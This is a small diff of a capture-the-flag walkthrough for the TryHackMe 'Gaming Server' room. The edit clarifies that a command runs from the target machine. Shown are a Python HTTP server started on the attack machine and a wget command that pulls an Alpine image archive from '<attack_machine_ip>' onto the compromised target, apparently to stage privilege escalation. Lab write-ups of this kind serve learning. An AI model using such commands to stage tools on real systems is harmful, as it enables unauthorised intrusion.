ericbulloch/kwmd/write_ups/try_hack_me/gaming_server.md

 $ python3 -m http.server
 ```

 Now I am going to download what I need from attack machine onto the target machine.
-Here is the command I used:
+Here is the command I used from the target machine:

 ```bash
 $ wget http://<attack_machine_ip>:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz